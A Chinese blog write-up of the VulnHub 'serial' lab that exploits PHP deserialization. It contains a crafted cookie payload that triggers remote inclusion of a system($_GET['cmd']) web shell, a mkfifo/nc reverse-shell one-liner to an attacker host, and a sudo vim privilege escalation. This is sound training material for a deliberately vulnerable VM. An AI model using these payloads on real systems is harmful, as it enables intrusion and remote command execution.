vulhub-serial-php反序列化靶机实战

最新推荐文章于 2024-08-19 17:43:54 发布
最新推荐文章于 2024-08-19 17:43:54 发布
阅读量1.9k 收藏
点赞数
分类专栏: 渗透测试 文章标签: 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41954384/article/details/103831182
版权

前言

此漏洞环境是vulhub上的系列漏洞之一,是php反序列化漏洞,也用到了远程代码执行漏洞。

复现过程

环境搭建

靶机下载地址

https://www.vulnhub.com/entry/serial-1,349/

下载好之后直接用Vmware workstation打开就行了

存活扫描

内网存活主机扫描

arp-scan -l

扫描到的存活主机是192.168.77.157
在这里插入图片描述

端口扫描

扫描开放的端口

nmap -sV -p- 192.168.77.157

发现开放了80,22号端口
在这里插入图片描述

访问web服务

在这里插入图片描述
页面上显示

Hello sk4This is a beta test for new cookie handler

burp抓包:
在这里插入图片描述
发现cookie是base64加密过的,解密后发现是经过序列化过的:

O:4:"User":2:{s:10:" User name";s:3:"sk4";s:9:" User wel";O:7:"Welcome":0:{}}
o:代表存储的是对象(object),如果传入的是一个数组,那它会变成字母a。
4:表示对象的名称有4个字符。User表示对象名称,刚好是4个字符。
2:表示有2个值
s:表示字符串,数字表示字符串的长度,s:10:" User name";

在这里补充一下PHP序列化/反序列化的相关内容
php序列化和反序列化函数是serialize()和unserialize(),serialize()可以将变量转换为字符串并且在转换中可以保存当前变量的值;unserialize()可以将serialize()生成的字符串转化为变量。php进行序列化的目的就是保存一个对象方便以后的重用。说到反序列化就不得不说一下魔法函数,常见的魔法函数有

(1)construct():当对象创建时会自动调用(但在unserialize()时是不会自动调用的)。
(2)wakeup() :unserialize()时会自动调用
(3)destruct():当对象被销毁时会自动调用。
(4)toString():当反序列化后的对象被输出在模板中的时候(转换成字符串的时候)自动调用
(5)get() :当从不可访问的属性读取数据
(6)call(): 在对象上下文中调用不可访问的方法时触发
(7)sleep():使用serialize时触发

魔法函数的调用是在一个类序列化或者反序列化的同时自动完成的,不需要人工干预,这就非常符合我们的想法,因此只要魔法方法中出现了一些我们能利用的函数,我们就能通过反序列化中对其对象属性的操控来实现对这些函数的操控,进而达到我们发动攻击的目的。

目录扫描

使用御剑扫描发现存在**…/backup/**路径,访问发现存在目录遍历漏洞:
在这里插入图片描述
下载bak.zip,发现有三个源代码

代码审计

index.php
<?php
        include("user.class.php");</small>

        if(!isset($_COOKIE['user'])) {
                setcookie("user", base64_encode(serialize(new User('sk4'))));
        } else {
                unserialize(base64_decode($_COOKIE['user']));
        }
        echo "This is a beta test for new cookie handler\n";
?>

log.class.php
<?php
  class Log {
    private $type_log;

    function __costruct($hnd) {
      $this->$type_log = $hnd;
    }

    public function handler($val) {
      include($this->type_log);
      echo "LOG: " . $val;
    }
  }
?>

user.class.php
<?php
  include("log.class.php");

  class Welcome {
    public function handler($val) {
      echo "Hello " . $val;
    }
  }

  class User {
    private $name;
    private $wel;

    function __construct($name) {
      $this->name = $name;
      $this->wel = new Welcome();
    }

    function __destruct() {
      //echo "bye\n";
      $this->wel->handler($this->name);
    }
  }

?>

三个源代码,index.php把cookie序列化然后再base64编码一下;user.class.php定义了两个类,一个是Welcome,另一个是User,上面我们base64解码之后的就是把User序列化之后的结果,分析User这个类,发现有$this->wel = new Welcome();那就再看Welcome这个类,发现这个类里面写的是一个handler()函数,而且还包含了log.class.php,我们再去看log.class.php,

public function handler($val) {
  include($this->type_log);
  echo "LOG: " . $val;

这里存在着文件包含漏洞,我们可以加以利用输出一些我们想要的信息

Getshell

根据解码后的cookie进行构造,出现文件包含漏洞的是Log类,所以我们就加上序列化之后的Log类的内容

O:4:"User":2:{s:10:" User name";s:3:"sk4";s:9:" User wel";O:7:"Welcome":0:{}}</small>

O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:3:"Log":1:{s:8:"type_log";s:27:"http://xx.xx.xx.xx/shell.txt";}}
此poc用到了远程文件包含漏洞,shell.txt是我在远程服务器上放的木马,内容是
<?php
system($_GET['cmd']);
?>

>>> base64.b64encode(b'O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:27:"http://xx.xx.xx.xx/shell.txt";}}')
b'Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6Mjc6Imh0dHA6Ly8xNDAuMTQzLjEyMi4xMy9jLn'
注意此处的空格需要用\00代替,链接就是我放在服务器上的一个木马的地址,修改url的时候不要忘记把s修改一下

burp重放
在这里插入图片描述

反弹shell

编码前:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc xx.xx.xx.xx 4444 >/tmp/f
编码后:
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+xx.xx.xx.xx+4444+>/tmp/f

在这里插入图片描述
在这里插入图片描述

提权

获取到shell后在根目录下发现文件credentials.txt.bak,里面是sk4用户的密码,有了密码就可以通过22端口进行远程连接了
提权方法是通过sudo -l查看当前用户可执行和无法执行的命令,发现vim对所有用户都NOPASSWORD,所就尝试sudo vim,进入到命令模式输入!bash,就可以成功提权。
在这里插入图片描述
在这里插入图片描述

参考文章

远程文件包含:https://www.jianshu.com/p/be68cf9be911
php反序列化:https://imysec.cn/2019/03/27/php-xu-lie-hua-yu-fan-xu-lie-hua/
            https://xz.aliyun.com/t/3674
            https://www.k0rz3n.com/2018/11/19/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/#1-%E6%A6%82%E5%BF%B5%E8%A7%A3%E9%87%8A%EF%BC%9A
反弹shell:https://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html
https://mp.weixin.qq.com/s?__biz=Mzg4MzA4Nzg4Ng==&mid=2247483980&idx=1&sn=7009611467280235e020d9dc2bfb79e4&chksm=cf4d8d2df83a043b5dada8d3239f521c90fc1fb25c46d53c8587673acf982251b2302c0efeb4&mpshare=1&scene=1&srcid=&sharer_sharetime=1570769686338&sharer_shareid=62f0fff7c8b6ad3fb28d5be3244bea91&key=f3b89a09cde51f0fdbad4af22908c0f665373d6e9d648b35ff04a2bce7cb6280bc37c79fc979034db3d63288319f3433cb3d27798738c4f62d7426b45bff32c5c2ec445b03996541b829e6b49b0418e7&ascene=1&uin=Mjk3MTU2ODQ5&devicetype=Windows+10&version=62070141&lang=zh_CN&pass_ticket=d4y2wiXz0x%2FRPuCGj%2FU%2FgrlvMD1dRyPHSJVBX56CpDZ%2BWKCs171mNJinVFauuuDd
飞鱼的企鹅
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulhub —— MERCY-v2 实战
战神/calmness的博客
12-24 1538
目录 目标 环境 过程 信息收集 nmap扫描 访问8080端口页面 目录遍历 dirb gobuster manager页面 扫描nikto 枚举 用户enum4linux 版本信息 搜索tomcat 漏洞 访问共享 搜索漏洞rips 0.53 文件包含 配置信息tomcat7/tomcat-users.xml 获得用户名和密码 文件上传 获取shell 信息扫描 LinEnum.sh扫描到的用户: linux-exploit-suggester.sh 收集
[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645
qq_51577576的博客
09-14 1627
[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645 Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本存在安全漏洞。攻击者可利用该漏洞执行任意代码。
php反序列化靶机serial实战
zzgslh的博客
04-07 1247
靶机描述 今天研究一下php反序列化靶机serial实战。目标为获取root权限。 靶机信息 可以去vulhub上下载此靶机: https://www.vulnhub.com/entry/serial-1,349/ 下载好,之后,使用Vmware新建虚拟机打开,步骤如下: 1.首先创建新的虚拟机。 2.然后选择客户机版本为Ubuntu 64位。 3.然后选择使用现有磁盘,选择下载的...
serial靶机
weixin_66503195的博客
08-01 377
发现cookie是base64加密过的,解密后发现是经过序列化过的。经过代码审计可构造payload,尝试读取passwd文件。F12查看,是一串base64编码。用御剑扫描得到backup路径。得到三个php文件他们放一起。
php反序列化语句实例,PHP反序列化的一些例子
weixin_34006872的博客
03-11 597
之前web一直被PHP反序列化的一些问题困扰,现在痛定思痛,决定好好的总结一番(大佬请略过)一般反序列化能用的例子都是利用了PHP的一些可以自动调用的特殊函数,类似于C++的构造函数之类的,不需要其他函数调用即可自动运行。通常称这些函数为魔幻函数,常用的魔幻函数包括construct(),destruct(), sleep(),wakeup(), toString().首先我们以constr...
php序列漏洞 实例_PHP反序列化漏洞原理及示例
weixin_30910893的博客
03-09 249
文章目录序列化与反序列化PHP魔法函数反序列化漏洞简介原理触发条件示例PHP反序列化PHP反序列化序列化与反序列化序列化说通俗点就是把一个对象变成可以传输的字符串。序列化过程还会对不同属性的变量进行不同方式的变化public的属性在序列化时,直接显示属性名protected的属性在序列化时,会在属性名前增加0x00*0x00,其长度会增加3private的属性在序列化时,会在属性名前增加0x00...
PHP反序列化【原理+CTF实战
2301_80127209的博客
04-19 1157
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。序列化的目的是方便数据的传输和存储,在PHP序列化和反序列化一般用做缓存,比如session缓存,cookie等.进行绕过,(在赛后我把题给Ssh1y写了,他的利用方式是nc弹个shell,属实是开拓了我的眼界)。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。”,这显然就无法继续利用了。编码后在前部加7个1。
vulhub-master.zip
06-10
Vulhub是一个面向广大安全研究者和爱好者的开源项目,其主要目的是提供一系列的安全漏洞靶场环境。这个项目名为“vulhub-master.zip”的压缩包,包含了一个2020年6月10日更新的Vulhub完整版本。Vulhub的设计理念是...
[ vulhub漏洞复现篇 ] Apereo-cas 4.1 反序列化远程代码执行漏洞
qq_51577576的博客
10-24 1296
[ vulhub漏洞复现篇 ] Apereo-cas 4.1 反序列化远程代码执行漏洞 Apereo CAS 是一款Apereo发布的集认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞(硬编码导致的漏洞),进而执行任意命令。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战,主机发现是指通过各种技术手段来发现目标网络...
Vulhub-Mysql 身份认证绕过漏洞(CVE-2012-2122)
weixin_45540609的博客
09-08 866
一、漏洞简介 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 二、漏洞范围 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL versions from 5.1.63, 5.5.24, 5.
Vulhub-DC-7靶场实战攻略
weixin_51339377的博客
03-17 218
arp-scan -l nmap -T4 -A 192.168.206.141 PS:ssh链接成功 接下来可以直接链接mysql 然后查看用户 改掉密码就可以登录后台了 也可以借鉴下面这个思路 通过drush重置密码 进入/var/www/html/ 目录下以后 由于是Drupal搭建的网站 计划任务用到了drush 可以尝试如下的命令重置登录密码和用户 drush user-password admin --password="abcdefg"...
PHP序列化与反序列化-总结实战
qq_45836485的博客
04-15 513
PHP序列化与反序列化 摘要 什么是序列化与反序列化 PHP序列化与反序列化 实战案例 实在案例2 什么是序列化与反序列化 序列化与反序列化是面向对象语言特有的表示形式 序列化 将变量转换为可保存或传输的字符串的过程 反序列化 把字符串转化为原来的变量 PHP序列化与反序列化 PHP序列化、反序列化方法主要有四种 1.serialize/unserialize 这两个是序列化和反序列化PH...
[Vulnhub] serial-php反序列化漏洞
weixin_45605352的博客
05-05 798
0x01 环境搭建 漏洞环境:https://www.vulnhub.com/entry/serial-1,349/ 下载后使用Vmware打开 创建新的虚拟机: 选择客户机版本为Ubuntu 64位: 一直下一步,知道选择使用现有磁盘: 选择下载的vmdk磁盘文件: 开机,环境配置完成: 0x02 漏洞复现 探测主机存活及端口 用nmap探测主机存活,探测到存活主机192.168.1.111,开放了22端口和80端口: nmap -PS -T4 192.168.1.0/
反序列化漏洞-02】PHP反序列化漏洞实验详解
cc
03-02 2835
序列化:程序将对象状态转换为可存储或传输的字节序列的过程(即对象状态转换为可存储或者可传输的过程){序列化是对象转换为字符串的过程}反序列化:程序把存储或传输的字节序列恢复为对象的过程。{反序列化则是字符串转化为对象的过程}如果字符串客户端可控,就会造成web应用反序列化任意对象,严重的是在反序列化的过程会触发一些可以执行的php代码,例如phpinfoPHP序列化与反序列化,基本都是围绕和两个函数展开的。在介绍这两个函数之前,我们可以先看一个简单的例子。
PHP反序列化学习(包含实例)
kiwi的博客
11-09 353
上面的是某道ctf题目其highlight_file为高亮显示某个文件里面的内容serialize为序列化函数unserialize为反序列化函数flag就在flag.php文件里面我们的思路就是利用highlight_file函数将flag.php读取获得flag__toString为当输出字符串的时候才会执行的方法就等于
PHP反序列化入门教程(一)
最新发布
weixin_46003602的博客
08-19 768
知识点:1、PHP-反序列化-应用&识别&函数2、PHP-反序列化-魔术方法&触发规则3、PHP-反序列化-联合漏洞&POP链构造在实战情况下,是不需要知道这些具体分析的,都是利用工具去扫一些框架爆出的序列话漏洞直接利用即可。学这些具体分析就是为了以后往漏洞挖掘方向发展或者打CTF比赛及面试会被问。
vulnhub靶场serial-php渗透
问彡心的博客
07-31 1392
整个渗透过程主要漏洞在于反序列化的利用配合远程文件包含,将wel的对象替换,由于恰好Log对象存在handler函数且有文件包含,才能进行利用,我把这招称之为"偷梁换柱",还是很形象的,当执行一句话木马时,离成功也就不远了,随之从弹终端得到的账户密码进行远程登陆,在执行命令过程通过提示发现了sudo下的vim是可以直接执行的,在vim命令行有!command暂时离开vim到指令列模式下执行command的显示结果,利用此功能成功借用了bash来执行输入的命令httpshttps。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值